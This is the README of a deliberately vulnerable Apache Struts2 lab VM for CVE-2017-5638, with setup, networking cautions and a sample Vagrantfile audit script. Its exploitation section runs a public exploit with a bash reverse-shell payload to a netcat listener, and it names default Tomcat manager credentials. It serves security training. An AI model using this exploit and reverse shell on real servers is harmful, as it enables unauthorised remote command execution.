vuln-struts2-vm's Introduction

A Vulnerable Apache Struts Application

Confirmed Vulnerabilities

CVE | Description | URL
2017-5638 | Remote Command Vulnerability in Apache Struts | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

Requirements:

Setup

$ git clone https://github.com/evolvesecurity/vuln-struts2-vm.git
$ cd vuln-struts2-vm

Build Virtual Machine

IMPORTANT: The VM currently uses "public networking" (See: Vagrantfile). This should only be used on a secure LAN. Otherwise, "private networking" should be used.

See: https://www.vagrantup.com/docs/virtualbox/networking.html
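
A check for the networking mode warned about above, as an added example that is not part of this repository: it scans Vagrantfile text for network declarations and flags the ones that make the guest reachable from beyond the host. The two Vagrantfile snippets, the IP address in them and the function names are constructed for illustration; the repository's actual Vagrantfile may differ.

```python
import re

# Matches `<obj>.vm.network "kind", opts` or `:kind, opts` (assumes one declaration per line).
NETWORK_RE = re.compile(r'\.vm\.network\s*\(?\s*[:"\']([a-z_]+)["\']?\s*(.*)')
# A forwarded port is host-only when host_ip pins it to loopback (new-style hash syntax assumed).
LOOPBACK_RE = re.compile(r'host_ip:\s*["\']127\.0\.0\.1["\']')

def audit_vagrantfile(text):
    """Return (line_no, kind, exposed) for every network declaration in the text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0]  # drop Ruby comments (assumes no '#' inside strings)
        m = NETWORK_RE.search(line)
        if not m:
            continue
        kind, opts = m.group(1), m.group(2)
        # public_network bridges the guest onto the LAN; a forwarded port without
        # host_ip is bound on every host interface. private_network is host-only.
        exposed = kind == "public_network" or (
            kind == "forwarded_port" and not LOOPBACK_RE.search(opts))
        findings.append((no, kind, exposed))
    return findings

def is_isolated(text):
    """True when no declaration exposes the vulnerable guest beyond the host."""
    return not any(exposed for _, _, exposed in audit_vagrantfile(text))

# Constructed sample: the setting the README warns about.
WEAK = '''\
Vagrant.configure("2") do |config|
  config.vm.network "public_network"
end
'''

# Constructed sample: host-only network plus a loopback-bound port forward.
HARDENED = '''\
Vagrant.configure("2") do |config|
  # config.vm.network "public_network"
  config.vm.network "private_network", ip: "192.168.56.10"
  config.vm.network "forwarded_port", guest: 8080, host: 8080, host_ip: "127.0.0.1"
end
'''

if __name__ == "__main__":
    for name, sample in (("weak", WEAK), ("hardened", HARDENED)):
        for no, kind, exposed in audit_vagrantfile(sample):
            print(f"{name}: line {no}: {kind}: {'EXPOSED' if exposed else 'ok'}")
```

Running the same function over the real Vagrantfile before `vagrant up` shows which declaration needs changing.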

$ vagrant up # this will raise and provision your machine
$ vagrant ssh
# to get the IP of your machine if unknown:
ubuntu@strut $ ip route

Verification:

You should now visit http://IP:8080 to see if tomcat8 is working. If the URL is unavailable, try http://IP:8080/manager with the credentials "tomcat" and "tomcat".

Exploitation:

Open a terminal, then run the command below to start a TCP listener.

$ nc -nvlp 5556

Open a separate terminal, then run the commands below to carry out the exploit with a reverse shell. Replace IP-TARGET with the target IPv4 address. Replace IP-LISTENER with your listening host's IPv4 address.

# download exploit from https://www.exploit-db.com/exploits/41570/
# or use searchsploit
$ searchsploit Struts #optional
$ cp /path/to/linux/webapps/41570.py exploit.py
$ python exploit.py "http://IP-TARGET:8080/http-session/hello.action" "bash -i >& /dev/tcp/IP-LISTENER/5556 0>&1"

It may be necessary to modify your exploit.py in order to pass in the command you want.

One option to confirm your exploit is to simply set up a netcat listener and connect back to it.

Troubleshooting:

If you wish to ssh directly into your vm without using the vagrant ssh command, you need to set a password for the ubuntu user. First, ssh into the vm using vagrant ssh and then perform a password reset using passwd ubuntu.

Credits:

The source code for the Apache Struts2 applications was taken from https://github.com/apache/struts-examples. The pom.xml files were modified slightly in order to downgrade Apache Struts2 to a vulnerable version.
